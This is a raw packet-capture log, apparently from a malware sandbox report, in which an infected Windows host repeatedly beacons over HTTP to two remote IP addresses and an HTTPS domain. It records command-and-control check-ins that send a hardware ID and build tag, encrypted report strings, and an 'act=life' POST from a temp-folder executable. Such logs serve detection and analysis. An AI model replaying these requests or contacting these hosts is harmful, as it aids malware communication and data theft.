Dec 15, 2024 00:04:20.752525091 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 2d 2d 0d 0a Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="build"stok------DBKFHJEBAAEBGDGDBFBG--
Dec 15, 2024 00:04:21.204840899 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	50304	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:20.809649944 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:22.175745010 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	50305	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:23.813085079 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:25.149245977 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	50307	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:26.894125938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:28.235641956 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	50308	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:29.879698038 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:31.230803013 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	50310	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:32.982470989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:34.331836939 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	50311	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:35.994246960 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:37.324625015 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	50313	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:39.078686953 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:40.422693968 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	50314	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:42.066832066 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:43.401931047 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	50315	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:45.197169065 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:46.537735939 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	50319	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:48.185839891 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:49.532779932 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	50321	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:51.289005995 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:52.637737036 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	50324	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:54.080606937 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 15, 2024 00:04:55.427186966 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 15, 2024 00:04:55.431327105 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="build"stok------HJDHCFCBGIDGHJJKJJDG--
Dec 15, 2024 00:04:55.878252983 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	50325	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:54.280082941 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:55.619076967 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	50326	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:57.371025085 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:58.711842060 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	50327	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:00.352463961 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:05:01.696933985 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	50329	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:03.457012892 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:05:04.786648989 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	50331	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:06.419848919 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:05:07.768994093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	50333	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:09.525216103 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:05:10.867554903 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	50334	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:12.506589890 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:05:13.843493938 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	50336	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:15.591501951 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:05:16.938859940 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	50337	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:18.574029922 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:05:19.919996977 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	50338	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:05:21.675302982 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:05:23.016784906 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49787	104.21.51.88	443	5444	C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:17 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: shineugler.biz
2024-12-14 22:58:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
